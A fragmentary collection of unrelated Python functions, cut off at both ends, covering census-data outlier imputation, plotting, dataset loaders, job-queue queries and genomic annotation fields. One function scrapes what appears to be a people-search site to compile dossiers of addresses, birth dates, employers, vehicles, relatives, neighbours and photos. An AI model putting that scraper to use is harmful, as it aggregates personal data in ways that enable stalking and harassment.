(PS, I realize if we are just executing the script directly, the plots\n # will just flash by, but I didn't want to clutter the HD with saved\n # images, so I assume you'll be following along this part by just running\n # the things in main() one by one)\n pd.plotting.scatter_matrix(my_data.train_df)\n plt.show()\n\n \"\"\"see:\n A good amount of binning of age and hours-per-week into discrete values\n (probably integer values for each). Also, perhaps an overabundance of\n people at age 90 and that work 99 hours a week, but these are probably\n individuals that go even higher, but were truncated at these values.\n Overall, nothing really out of the ordinary, except for in capital-gain,\n it looks like there is a big jump from most of the values up to 99999\n (nothing between ~50k to 99,999), with the vast majority of the\n values at 0 (makes sense, since if we look at the capital-gain vs\n capital-loss plot, it looks like we can only have non-zero values for\n one of those categories.) Let's try looking at captial-gain without\n the capital-loss individuals\n \"\"\"\n\n # Plot capital-gains without people that have a capital-loss (who are given\n # capital-gain of 0)\n my_data.train_df['capital-gain']\\\n [my_data.train_df['capital-gain'] != 0].hist()\n plt.show()\n\n \"\"\"see:\n True enough, it looks like there is an over-abundance of values for\n individuals with a capital-gain of 99,999. Let's have pandas calculate\n the quartiles to confirm.\n \"\"\"\n\n # Get the quartiles for the capital-gain column, excluding the capital-loss\n # individuals\n my_data.train_df['capital-gain']\\\n [my_data.train_df['capital-gain'] != 0].describe()\n\n \"\"\"Indeed, it looks like the 99,999 values are outliers, as the 75% of\n the non-0 values is at 14,084.\n \"\"\"\n\n # I was originally going to try to fit a gaussian distribution to the\n # histogram to re-assign the 99,9999 individuals based on it, but if\n # we take a look at:\n my_data.train_df['capital-gain'][\n (my_data.train_df['capital-gain'] != 0) &\n (my_data.train_df['capital-gain'] < 75000)].hist(bins=100)\n plt.show()\n\n # We see this is a tri-modal distribution (it'll be interesting to\n # see what makes up the groups at the 7-8 thousand range, and the group\n # at ~15 tousand).So, instead, replace with a value randomly picked from\n # the exact non-zero, non-99,9999 distribution. First, need to grab\n # these values\n good_val = my_data.train_df['capital-gain'][\n (my_data.train_df['capital-gain'] != 0) &\n (my_data.train_df['capital-gain'] < 99999)].values\n\n # Now, define a function that will return a random instance of\n # the good values\n def get_good_val(vals=good_val):\n \"\"\"quick helper function to allow easy re-assigning of the outlier\n values in the capital-gain column, preserving the non-zero\n distribution.\n\n Args:\n vals (np.ndarray): The non-zero, non-99,999 values from the\n capital-gain column\n\n Returns:\n int: A random value from the distribution\n \"\"\"\n\n # Return a value from the distribution randomly\n return vals[rand.randint(0, (vals.shape[0] - 1))]\n\n # Now, use the helper function to reset outlier values based on the\n # non-zero, non-outlier distribution\n # First, define a mask to save the conditions we want\n mask = (my_data.train_df['capital-gain'] == 99999)\n\n # Now, for these outlier values, reset them based on the good values\n # distribution\n my_data.train_df.loc[mask, 'capital-gain'] = (\n my_data.train_df[mask]['capital-gain'].apply(lambda x: get_good_val())\n )\n\n # Check the distribution that it looks ok\n my_data.train_df[my_data.train_df['capital-gain'] != 0]['capital-gain']\\\n .hist(bins=40)\n plt.show()\n\n # Looking at the test dataset:\n pd.plotting.scatter_matrix(my_data.test_df)\n plt.show()\n\n # It looks like we have a similar problem, so repeat the procedure\n # For the test set, using the test set's distribution\n good_val = my_data.test_df['capital-gain'][\n (my_data.test_df['capital-gain'] != 0) &\n (my_data.test_df['capital-gain'] < 99999)].values\n\n # Define the mask\n mask = (my_data.test_df['capital-gain'] == 99999)\n\n # Now, for these outlier values, reset them based on the good values\n # distribution\n my_data.test_df.loc[mask, 'capital-gain'] = (\n my_data.test_df[mask]['capital-gain'].apply(\n lambda x: get_good_val(good_val))\n )\n\n # Check the distribution that it looks ok\n my_data.test_df[my_data.test_df['capital-gain'] != 0]['capital-gain']\\\n .hist(bins=40)\n plt.show()", "def generate_personnel_trend_graph(selected_funding, selected_year, selected_row_indices, rows, search_ids_personnel, search_ids_professors_keywords, personnel_name, search_keywords):\n\n names = []\n personnel = pd.DataFrame(rows)\n if selected_row_indices:\n names = personnel[\"Personnel\"].iloc[selected_row_indices]\n\n\n filtered_data = funding_data[\n funding_data.start_year.isin(selected_year)\n # & funding_data['Submitting Institution Name:'].isin(selected_uni)\n # & funding_data['Project Status:'].isin(selected_award_status)\n & funding_data['Program Cycle:'].isin(selected_funding)]\n\n\n selected_personnel_data = filtered_data.loc[filtered_data[\"Lead Investigator:\"].isin(names)]\n\n\n\n # Getting the projects of the selected names from personnel_data\n\n personnel_data_filtered = personnel_data\n personnel_data_filtered = personnel_data_filtered[\n personnel_data_filtered[\"Proposal Number:\"].isin(filtered_data[\"Proposal Number:\"])]\n\n personnel_data_filtered = personnel_data_filtered[personnel_data_filtered[\"investigator\"].isin(names)]\n\n # A pandas dataframe containg the list of projects for each selected personnel\n\n if search_keywords and len(search_keywords) > 0:\n if len(search_ids_professors_keywords) > 0:\n search_ids_professors_keywords = json.loads(search_ids_professors_keywords)\n search_ids_professors_keywords = np.array(search_ids_professors_keywords)\n\n # Using the dataset only to get relevant names of the personnel who are involved in the project\n # from personnel_data\n filtered_data = filtered_data[filtered_data._id.isin(search_ids_professors_keywords[0:, 0])]\n list_of_projects = filtered_data[\"Proposal Number:\"]\n personnel_data_filtered = personnel_data_filtered[\n personnel_data_filtered[\"Proposal Number:\"].isin(list_of_projects)]\n\n # print(\"Personnel Projects list is \", personnel_projects_list)\n # personnel_names = personnel_data_filtered[\"investigator\"].unique()\n # print(\"Personnel Who have worked in this field are \", personnel_names)\n\n personnel_projects_list = personnel_data_filtered.groupby('investigator')['Proposal Number:'].apply(list)\n print(\"Personnel Projects list is \", personnel_projects_list)\n\n\n\n\n # if personnel_name and len(personnel_name) > 0:\n # if len(search_ids_personnel) > 0:\n # # Using the dataset only to get relevant names of the personnel who are involved in the project\n # # from personnel_data\n #\n # personnel_data_filtered = personnel_data_filtered[personnel_data_filtered._id.isin(search_ids_personnel)]\n #\n # # Filtering the datasets based on search ids and filtered_data\n # # Find a better way to do filters by join?\n #\n # filtered_data = filtered_data[\n # filtered_data[\"Proposal Number:\"].isin(personnel_data_filtered[\"Proposal Number:\"])]\n #\n # personnel_projects_list = personnel_data_filtered[[\"investigator\", \"Proposal Number:\"]].groupby(\n # 'investigator').agg({\"Proposal Number:\": lambda x: [].append(x)})\n #\n # print(\"Personnel Projects list is \", personnel_projects_list)\n # personnel_names = personnel_data_filtered[\"investigator\"].unique()\n # print(\"Personnel Who have worked in this field are \", personnel_names)\n\n\n def make_project_count_dict(df):\n \"\"\"\n From the DF that is passed ( containing one personnel with all his projects, calculates the number of years a\n project was active,\n :param df:\n :return: An Ordered Dictionary with the number of projects active per year for that personnel.\n \"\"\"\n year_lists = []\n null_date_info_projects = 0\n for i in range(len(df)):\n start_date = df[\"Start Date:\"].iloc[i]\n end_date = df[\"End Date:\"].iloc[i]\n if (start_date == -1) or (end_date == -1):\n null_date_info_projects += 1\n continue\n year_lists.append(list(range(start_date.year, end_date.year + 1))) # +1 because the project is active that year. It needs to show on graph\n print(year_lists)\n year_count_dict = OrderedDict.fromkeys(range(2000, datetime.now().year + 5), 0)\n print(year_count_dict)\n for i in year_lists:\n for j in i:\n year_count_dict[j] += 1\n return year_count_dict, null_date_info_projects\n\n def make_traces(names, personnel_projects_list):\n traces = []\n null_date_info_projects = 0\n for i in names:\n list_of_projects = personnel_projects_list.loc[i]\n # list_of_projects = personnel_projects_list[\"Proposal Number:\"].loc[personnel_projects_list[\"investigator\"] == i]\n list_of_project_records = filtered_data.loc[filtered_data[\"Proposal Number:\"].isin(list_of_projects)] # Passing the DF containing all the projects that a personnel was involved with\n personnel_year_count_dict, null_date_info_projects = make_project_count_dict(list_of_project_records)\n sample_trace_object = go.Scatter(\n x=list(personnel_year_count_dict.keys()),\n y=list(personnel_year_count_dict.values()),\n opacity=0.7,\n # Adding the null_date_info_projects into the name\n name=i +\" \"+ str(null_date_info_projects),\n line=dict(\n # color=('rgb(22, 96, 167)'),\n width=4,\n shape='hv'\n # colorscale='YlGnBu'\n ),\n mode='lines+markers'\n )\n traces.append(sample_trace_object)\n return traces\n\n traces = make_traces(names, personnel_projects_list)\n\n\n # years = [i for i in range(2008,2018)]\n # numbers = random.choices(population=[0, 1, 2, 3], k=len(years))\n\n # personnel = \"Doctor Name\"\n\n # trace1 = go.Scatter(\n # x=years,\n # y=numbers,\n # name='Professor Name Here',\n # line=dict(\n # color=('rgb(22, 96, 167)'),\n # width=4,\n # ),\n # mode='lines+markers'\n # )\n\n\n return {\n 'data': traces,\n 'layout': go.Layout(\n # autosize=False,\n title='Projects in a year for selected personnel',\n xaxis=dict(\n # tickangle=-45,\n zeroline=False, # no thick y=0 line\n showgrid=False, # no horizontal grid lines\n showticklabels=True, # no y-axis tick labels\n dtick=1,\n ),\n yaxis=dict(\n # type='log'\n dtick=1,\n ),\n showlegend=True,\n # legend=go.Legend(\n # x=0,\n # y=1.0\n # ),\n # legend=dict(x=.75, y=1),\n # bargap =0.5,\n # width = 100,\n # autosize=F,\n margin=go.layout.Margin(l=40, r=0, t=30, b=40),\n # paper_bgcolor='rgb(233,233,233)', # set paper (outside plot)\n plot_bgcolor='rgb(192,192,192)', # plot color to grey\n )\n }", "def _deep_data(self, url):\n def _nested_persons(persons):\n _persons = list()\n for person_ in persons:\n person_ = [r.text.split(', ') for r in person_.find_all(class_='default-text')]\n person = {'name': person_[0][0].title()}\n if len(person_[0]) == 2:\n person['age'] = person_[0][1]\n\n if len(person_[1]) > 0:\n person['addressLocality'] = person_[1][0].title()\n if len(person_[1]) == 2:\n person['addressRegion'] = person_[1][1].upper()\n\n _persons.append(person)\n return _persons\n\n with self.driver(self.DRIVER_DIR) as driver:\n driver.get(url)\n driver.fullscreen_window()\n time.sleep(2)\n txt = driver.page_source\n\n soup = bs(txt, 'html.parser')\n\n profile_data = soup.find(type=\"application/ld+json\")\n if profile_data is None:\n self._raise_site_schema_change()\n profile_data = profile_data.string\n profile_data = json.loads(profile_data, strict=False)\n profile_data['@id'] = profile_data.pop('@id').split('/')[-1]\n\n try:\n about = profile_data.pop('about')\n for k, v in about.items():\n profile_data[k] = v\n except KeyError:\n pass\n\n name_ = profile_data.pop('name')\n profile_data['name'] = name_\n\n name_ = name_.split()\n profile_data['givenName'] = name_[0]\n profile_data['middleName'] = ' '.join(name_[1:-1])\n profile_data['familyName'] = name_[-1]\n\n if soup.find(class_='rep-vcard-score') is not None:\n profile_data['reputation_score'] = \"{min}-{max}\".format(\n min=soup.find(class_='rep-vcard-min').text,\n max=soup.find(class_='rep-vcard-max').text\n )\n\n address = list()\n address_ = soup.find_all(class_='card-address')\n for a in address_:\n street_address, locality_region_postal, *misc = [_.text for _ in a.find_all(class_='block-container')]\n address_locality, locality_region_postal = locality_region_postal.split(',')\n address_region, postal_code = locality_region_postal.split()\n address.append({\n 'streetAddress': street_address,\n 'addressLocality': address_locality,\n 'addressRegion': address_region,\n 'postalCode': postal_code,\n })\n\n profile_data['address'] = address\n\n personal_details = soup.find(class_='card-personal-details')\n if personal_details is not None:\n personal_details = personal_details.find_all(class_='item-container')\n personal_details = [detail.text.split(': ') for detail in personal_details]\n personal_details = [_ for _ in personal_details if len(_) == 2]\n personal_details = {detail.lower().replace(' ', '_'): value for\n detail, value in personal_details if value != 'Add Info'}\n\n birth_date = personal_details.pop('date_of_birth')\n if len(birth_date) > 0:\n profile_data['birthDate'] = birth_date\n\n for key_, value_ in personal_details.items():\n profile_data[key_] = value_\n\n # Education\n schools_ = soup.find(class_='card-education')\n if schools_ is not None:\n schools = list()\n schools_ = schools_.find_all(class_='card-content')\n for school in schools_:\n school = [detail.text.split(': ') for detail in school.find_all(class_='item-container')]\n school = {detail.lower().replace(' ', '_'): value for\n detail, value in school if value != 'Add Info'}\n\n if len(school) == 0:\n continue\n\n school['@type'] = 'EducationalOrganization'\n school['name'] = school.pop('school')\n school['streetAddress'], school['addressLocality'] = school.pop('city').split(', ')\n schools.append(school)\n\n # Work\n employers = soup.find(class_='card-job')\n if employers is not None:\n works_for = list()\n employers = employers.find_all(class_='card-content')\n for employer in employers:\n employer = [detail.text.split(': ') for detail in employer.find_all(class_='item-container')]\n employer = {detail.lower().replace(' ', '_'): value for\n detail, value in employer if value != 'Add Info'}\n\n if len(employer) == 0:\n continue\n\n employer['@type'] = 'Organization'\n try:\n employer['name'] = employer.pop('company')\n except KeyError:\n continue\n\n if len(employer.get('city', '')) > 0:\n employer['streetAddress'], employer['addressLocality'] = employer.pop('city').split(', ')\n\n works_for.append(employer)\n\n if len(works_for) > 0:\n profile_data['worksFor'] = works_for\n\n # Automobiles\n automobiles = soup.find(class_='card-auto')\n if automobiles is not None:\n owns = list()\n automobiles = automobiles.find_all(class_='card-content')\n for automobile in automobiles:\n automobile = [detail.text.split(': ') for detail in automobile.find_all(class_='item-container')]\n automobile = {detail.lower().replace(' ', '_'): value for\n detail, value in automobile if value != 'Add Info'}\n\n if len(automobile) == 0:\n continue\n\n automobile['@type'] = 'Product'\n automobile['model'] = ' '.join([\n automobile.pop('year'),\n automobile.pop('make'),\n automobile.pop('model')\n ])\n owns.append(automobile)\n\n if len(owns) > 0:\n profile_data['owns'] = owns\n\n profile_data['relatedTo'] = _nested_persons(soup.find_all(class_='relative-container'))\n profile_data['neighbors'] = _nested_persons(soup.find_all(class_='neighbor-container'))\n\n # Photos\n profile_data['pictures'] = list({photo['src'] for photo in soup.find_all(class_='profile-picture-holder')})\n return profile_data", "def get_data():\n \n \"\"\" Prepare variables\"\"\"\n urls = {\"cases\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Confirmed.csv\",\n \"deaths\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Deaths.csv\",\n \"recovered\": \"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_19-covid-Recovered.csv\"}\n\n localnames = {\"cases\": \"Cases.csv\",\n \"deaths\": \"Deaths.csv\",\n \"recovered\": \"Recovered.csv\"}\n\n dfs = {\"cases\": None,\n \"deaths\": None,\n \"recovered\": None}\n\n \"\"\" Download\"\"\"\n for key in urls.keys():\n url = urls[key]\n localname = localnames[key]\n urllib.request.urlretrieve(url, localname)\n\n \"\"\" Load variables\"\"\"\n for key in dfs.keys():\n dfs[key] = pd.read_csv(localnames[key])\n \n \"\"\" Return\"\"\"\n return(dfs)", "def get_individual_df(nombre):\n clusters = []\n contadores = []\n for k, v in mydic[nombre][\"contador\"].items():\n clusters.append(k)\n contadores.append(v)\n return pd.DataFrame({\"CODIGO_POSTAL\": clusters, f\"contadores_{nombre}\": contadores})", "def get_metadata(datas):\n\n required_profile_key, required_item_key = 'basics', 'category'\n utility_matrix = []\n\n item_details, profile_details = {}, {}\n\n for _ , data in datas.items():\n profile_name, item_name = None, None\n\n # extracted profile data for user, because two user may have the same nick name\n # so we will concatenate user nick name and its profile link to form the unique one.\n if type(data) is dict and required_profile_key in data.keys() :\n profile_name = \"%s|%s\" % (data[required_profile_key].get('name',''),\n data[required_profile_key].get('profile',''))\n\n profile_details[profile_name] = get_profile_detail(data)\n print ('extracted data of profile: %s ...' % data[required_profile_key].get('name',''))\n\n # for item\n if type(data) is dict and required_item_key in data.keys():\n if hasattr(data[required_item_key],'items'):\n for k,v in data[required_item_key].items():\n\n item_detail = get_item_detail(v)\n print ('extracted data for category %s ...' % k)\n\n #item_detail_to_str = json.dumps(item_detail) #\" ; \".join(list(set(item_detail)))\n if k in item_details:\n item_details[k]['work'].append(item_detail['work'])\n item_details[k]['skill'].append(item_detail['skill'])\n else:\n item_details[k] = {}\n item_details[k]['work'] = [item_detail['work']]\n item_details[k]['skill'] = [item_detail['skill']]\n\n utility_matrix.append({\n 'profile': profile_name,\n 'item': k,\n 'rating':v['point']\n })\n\n return utility_matrix, \\\n {k:{'work':json.dumps(v['work']),'skill':json.dumps(v['skill'])} for k,v in item_details.items()}, \\\n profile_details", "def parse_info(df, idx, root):\n df_row = df.iloc[idx]\n\n img_id = str(df_row['id'])\n img_name = id_to_path(root, img_id)\n landmark_id = df_row.landmark_id\n return img_name, landmark_id", "def read_json_stats(url, parameters, tunnus):\r\n \r\n\r\n import requests \r\n from pyjstat import pyjstat\r\n from collections import OrderedDict\r\n import pandas as pd\r\n \r\n \r\n #query from JSON to be able to flatten data to one level\r\n col_list=[]\r\n for j in parameters[\"query\"]:\r\n col_list.append(j['code'])\r\n \r\n \r\n col_list.remove(tunnus)\r\n\r\n response = requests.post(url, json=parameters)\r\n if response.status_code == 200:\r\n try:\r\n json_data = response.json(object_pairs_hook=OrderedDict)\r\n except:\r\n print('Json error !!!!')\r\n return\r\n else:\r\n print('Error: Status code: {}'.format(response.status_code))\r\n return\r\n \r\n results = pyjstat.from_json_stat(json_data)\r\n stat=pd.DataFrame(results[0])\r\n stat = pd.pivot_table(stat, values='value', index=[tunnus],columns=col_list)\r\n stat.fillna(0,inplace=True)\r\n stat.reset_index(level=[0], inplace=True)\r\n if len(col_list) > 1:\r\n stat.columns = stat.columns.map(' '.join)\r\n stat.columns = stat.columns.str.strip()\r\n return(stat)", "def precipitation():\n\n return jsonify(prcp_df)", "def _info(self) -> tfds.core.DatasetInfo:\n features = tfds.features.FeaturesDict({\n \"tokens\":\n tfds.features.Sequence(tfds.features.Text()),\n \"tags\":\n tfds.features.Sequence(\n tfds.features.ClassLabel(names=[\n \"O\",\n \"B-PER\",\n \"I-PER\",\n \"B-ORG\",\n \"I-ORG\",\n \"B-LOC\",\n \"I-LOC\",\n ])),\n \"langs\":\n tfds.features.Sequence(tfds.features.Text()),\n \"spans\":\n tfds.features.Sequence(tfds.features.Text()),\n })\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=features,\n supervised_keys=None,\n homepage=\"https://github.com/afshinrahimi/mmner\",\n citation=_CITATION,\n )", "def get_task_flow_data(jeditaskid):\n data = []\n # get datasets\n datasets = []\n dquery = {'jeditaskid': jeditaskid, 'type__in': ['input', 'pseudo_input'], 'masterid__isnull': True}\n datasets.extend(JediDatasets.objects.filter(**dquery).values('jeditaskid', 'datasetname', 'type'))\n\n dataset_dict = {}\n for d in datasets:\n dname = d['datasetname'] if ':' not in d['datasetname'] else d['datasetname'].split(':')[1]\n dataset_dict[dname] = {'replica': {}, 'jobs': {}}\n\n # get jobs aggregated by status, computingsite and proddblock (input dataset name)\n jobs = []\n jquery = {'jeditaskid': jeditaskid, 'prodsourcelabel__in': ['user', 'managed'], }\n extra_str = \"( processingtype not in ('pmerge') )\"\n jvalues = ['proddblock', 'computingsite', 'jobstatus']\n jobs.extend(Jobsarchived4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobsarchived.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobsactive4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobsdefined4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n jobs.extend(Jobswaiting4.objects.filter(**jquery).extra(where=[extra_str]).values(*jvalues).annotate(njobs=Count('pandaid')))\n\n if len(jobs) > 0:\n for j in jobs:\n if len(j['proddblock']) > 0:\n dname = j['proddblock'] if ':' not in j['proddblock'] else j['proddblock'].split(':')[1]\n else:\n dname = next(iter(dataset_dict)) if len(dataset_dict) > 0 else 'pseudo_dataset'\n if j['computingsite'] is not None and j['computingsite'] != '':\n if j['computingsite'] not in dataset_dict[dname]['jobs']:\n dataset_dict[dname]['jobs'][j['computingsite']] = {}\n job_state = j['jobstatus'] if j['jobstatus'] in const.JOB_STATES_FINAL else 'active'\n if job_state not in dataset_dict[dname]['jobs'][j['computingsite']]:\n dataset_dict[dname]['jobs'][j['computingsite']][job_state] = 0\n dataset_dict[dname]['jobs'][j['computingsite']][job_state] += j['njobs']\n\n # get RSE for datasets\n replicas = []\n if len(datasets) > 0:\n dids = []\n for d in datasets:\n if d['type'] == 'input':\n did = {\n 'scope': d['datasetname'].split(':')[0] if ':' in d['datasetname'] else d['datasetname'].split('.')[0],\n 'name': d['datasetname'].split(':')[1] if ':' in d['datasetname'] else d['datasetname'],\n }\n dids.append(did)\n\n rw = ruciowrapper()\n replicas = rw.getRSEbyDID(dids)\n\n if replicas is not None and len(replicas) > 0:\n for r in replicas:\n if r['name'] in dataset_dict:\n dataset_dict[r['name']]['replica'][r['rse']] = {\n 'state': r['state'],\n 'available_pct': round(100.0 * r['available_length']/r['length'], 1) if r['length'] > 0 else 0\n }\n\n # transform data for plot and return\n return executeTF({'data': {'datasets': dataset_dict, } })", "def print_record_project_count(dataframe, dataset=\"full\"):\n if dataset == \"full\":\n print(\n \"For the ORIGINAL cleansed data, containing all available NYC capital \"\n \"projects change records:\\n\"\n )\n\n elif dataset == \"all\":\n print(\n \"For the data containing start and end data for all available \"\n \"NYC capital projects for the ENTIRE INTERVAL of changes \"\n \"covered in the ORIGINAL data:\\n\"\n )\n\n else:\n print(\n \"For the final {} data, containing the {} split of 3-year \"\n \"project data used in this analysis:\\n\".format(\n dataset.upper(), dataset\n )\n )\n\n # entries\n print(f\"\\tNumber of dataset records: {len(dataframe)}\")\n\n # num projects\n print(\n f\"\\tNumber of unique projects in dataset: {dataframe['PID'].nunique()}\\n\"\n )", "def define_info_dict():\n\n d = {\n \"PRED\": {\n \"COLUMN\": [\"predicted_class\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"Predicted class: somatic, germline, artifact\",\n },\n \"PROB\": {\n \"COLUMN\": [\"prob_s\", \"prob_g\", \"prob_a\"],\n \"Number\": \"3\",\n \"Type\": \"Float\",\n \"Description\": \"Prediction probability of \"\n \"being somatic, germline, artifact in this order\",\n },\n \"SNP\": {\n \"COLUMN\": [\"is_on_db\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Present on SNP database (modified dbSNP/gnomAD (default) or user-provided database)\",\n },\n \"ANNO\": {\n \"COLUMN\": [\"annotation\"],\n \"Number\": \".\",\n \"Type\": \"String\",\n \"Description\": \"Indel annotation formatted as \"\n \"GeneSymbol|RefSeqAccession|CodonPos|IndelEffect\"\n \"Delimited by comma for multiple isoforms\",\n },\n \"COSMIC_CNT\": {\n \"COLUMN\": [\"cosmic_cnt\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"COSMIC count in v89\",\n },\n \"MAXMAF\": {\n \"COLUMN\": [\"max_maf\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Maximum minor allele frequency (MAF) \"\n \"reported in dbSNP, ClinVar and gnomAD non-cancer population\",\n },\n \"COMMON\": {\n \"COLUMN\": [\"is_common\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Common in dbSNP or MAXMAF > 0.01\",\n },\n \"CLIN\": {\n \"COLUMN\": [\"clin_info\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"ClinVar annotation formatted as ClinicalSignificance|Condition\",\n },\n \"ICP\": {\n \"COLUMN\": [\"indel_complexity\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Indel complexity: mismatches around the indel measured by edit distance\",\n },\n \"DSM\": {\n \"COLUMN\": [\"dissimilarity\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Dissimilarity: edit distance between indel and flanking sequences\",\n },\n \"ISZ\": {\n \"COLUMN\": [\"indel_size\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Indel size\",\n },\n \"REP\": {\n \"COLUMN\": [\"repeat\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Repeat: count of the indel-sequence repeats in flanking region\",\n },\n \"UQM\": {\n \"COLUMN\": [\"is_uniq_mapped\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Supported by uniquely mapped reads\",\n },\n \"NEB\": {\n \"COLUMN\": [\"is_near_boundary\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Near exon boundary\",\n },\n \"EQX\": {\n \"COLUMN\": [\"equivalence_exists\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Equivalent alignments exist for the indel\",\n },\n \"BID\": {\n \"COLUMN\": [\"is_bidirectional\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Supported by forward and reverse reads\",\n },\n \"MTA\": {\n \"COLUMN\": [\"is_multiallelic\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Multialleleic\",\n },\n \"FRM\": {\n \"COLUMN\": [\"is_inframe\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"In-frame indel\",\n },\n \"SPL\": {\n \"COLUMN\": [\"is_splice\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Located in splice region\",\n },\n \"TRN\": {\n \"COLUMN\": [\"is_truncating\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Truncating indel\",\n },\n \"CDD\": {\n \"COLUMN\": [\"is_in_cdd\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Located in conserved domain\",\n },\n \"LOC\": {\n \"COLUMN\": [\"indel_location\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Relative indel location within the transcript coding region\",\n },\n \"NMD\": {\n \"COLUMN\": [\"is_nmd_insensitive\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Insensitive to nonsense mediated decay\",\n },\n \"IPG\": {\n \"COLUMN\": [\"ipg\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Indels per gene\",\n },\n \"LEN\": {\n \"COLUMN\": [\"cds_length\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Coding sequence length. Median value if multiple isoforms exist\",\n },\n \"LC\": {\n \"COLUMN\": [\"lc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Linguistic complexity: diversity of k-mers in flanking 50-bp region\",\n },\n \"LLC\": {\n \"COLUMN\": [\"local_lc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local linguistic complexity: diversity of k-mers in flanking 6-bp region\",\n },\n \"GC\": {\n \"COLUMN\": [\"gc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"GC-content in flanking 50-bp region\",\n },\n \"LGC\": {\n \"COLUMN\": [\"local_gc\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local GC-content in flanking 6-bp region\",\n },\n \"SG\": {\n \"COLUMN\": [\"strength\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"DNA bond strength of 2-mers in flanking 50-bp region\",\n },\n \"LSG\": {\n \"COLUMN\": [\"local_strength\"],\n \"Number\": \"1\",\n \"Type\": \"Float\",\n \"Description\": \"Local DNA bond strength of 2-mers in flanking 6-bp region\",\n },\n \"INS\": {\n \"COLUMN\": [\"is_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Insertion\",\n },\n \"ATI\": {\n \"COLUMN\": [\"is_at_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single insertion of A or T\",\n },\n \"ATD\": {\n \"COLUMN\": [\"is_at_del\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single deletion of A or T\",\n },\n \"GCI\": {\n \"COLUMN\": [\"is_gc_ins\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single insertion of G or C\",\n },\n \"GCD\": {\n \"COLUMN\": [\"is_gc_del\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Single deletion of G or C\",\n },\n \"ALTC\": {\n \"COLUMN\": [\"alt_count\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Alt count: count of unique reads supporting ALT allele\",\n },\n \"REFC\": {\n \"COLUMN\": [\"ref_count\"],\n \"Number\": \"1\",\n \"Type\": \"Integer\",\n \"Description\": \"Ref count: count of unique reads supporting REF allele\",\n },\n \"RCF\": {\n \"COLUMN\": [\"reclassified\"],\n \"Number\": \"0\",\n \"Type\": \"Flag\",\n \"Description\": \"Reclassification applied\",\n },\n \"RQB\": {\n \"COLUMN\": [\"filtered\", \"rescued\"],\n \"Number\": \"1\",\n \"Type\": \"String\",\n \"Description\": \"Indel used to rescue this entry formatted as CHROM:POS:REF:ALT\",\n },\n }\n\n return d", "def job_data(driver):\n job_info = {\n \"job_title\" : \"h1.title\",\n \"company\" : \"span.company\",\n \"location\" : \"h3.location\",\n \"employment_type\" : \"div.employment div.content div.rich-text\",\n \"industry\" : \"div.industry div.content div.rich-text\",\n \"experience\" : \"div.experience div.content div.rich-text\",\n \"job_function\" : \"div.function div.content div.rich-text\",\n \"description\" : \"div.summary div.content div.description-section div.rich-text\"\n }\n # click the 'read more' button to reveal more about the job posting\n try:\n driver.find_element_by_css_selector(\"button#job-details-reveal\").click()\n except Exception as e:\n print(\"error in attempting to click 'reveal details' button\")\n print(e)\n for key, selector in job_info.items():\n try:\n job_info[key] = driver.find_element_by_css_selector(selector).text\n except Exception as e:\n job_info[key] = \"\"\n pass\n return job_info", "def get_infos(self):\n infos = dict()\n infos['dataset'] = self._dataset_name()\n infos['task'] = self.task\n if self.task == 'sep_clean':\n data_license = [librispeech_license]\n else:\n data_license = [librispeech_license, wham_noise_license]\n infos['licenses'] = data_license\n return infos", "def get_data(self):\n\n all_data = 